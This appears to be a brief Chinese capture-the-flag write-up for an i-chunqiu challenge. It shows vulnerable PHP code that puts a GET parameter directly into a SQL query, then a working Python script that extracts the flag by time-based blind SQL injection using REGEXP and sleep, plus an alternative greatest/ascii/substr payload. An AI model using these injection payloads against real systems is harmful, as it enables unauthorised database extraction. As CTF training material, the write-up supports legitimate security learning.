<?php # flag在fl4g里 include 'waf.php'; header("Content-type: text/html; charset=utf-8"); $db = new mysql(); $id = $_GET['id']; if ($id) { if(check_sql($id)){ exit(); } else { $sql = "select * from flllllllag where id=$id"; $db->query($sql); } } highlight_file(__FILE__);
过滤了很多关键字,最后测试出可用的脚本如下:
import requests flag = "" cookie = { 'ci_session': '81cd4c07ec07bc129e75ccb445324278c8e78585', 'UM_distinctid': '16ec9cac110576-07f6681d74fa2e-e343166-144000-16ec9cac111912', 'chkphone': 'acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O', 'Hm_lvt_2d0601bd28de7d49818249cf35d95943': '1582019027,1582279859', 'Hm_lpvt_2d0601bd28de7d49818249cf35d95943': '1582289798', '__jsluid_h':'1ed6ca51c5238803967bab5074d8ecbc', 'Host':'487e2fb9c3434f49b036a43ee0f1638bb3374bb968df466b.changame.ichunqiu.com' } for i in range(1, 60): for j in '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^*``-{}': str = flag + j url = 'http://1f54bbcd8b8e4ed4a41ce9f710f2510c0b2eb757344a432e.changame.ichunqiu.com/?id=1%20and%20if(fl4g%20REGEXP%20"^f'+str+'",sleep(3),1)' try: r = requests.get(url=url, cookies=cookie, timeout=2) except requests.exceptions.ReadTimeout: flag += j print(flag) break
还有一种payload我没有测试,有兴趣的可以自己试试
0 or if(greatest(ascii(substr(fl4g,%d,1)),%d)-%d,sleep(3),1) limit 1#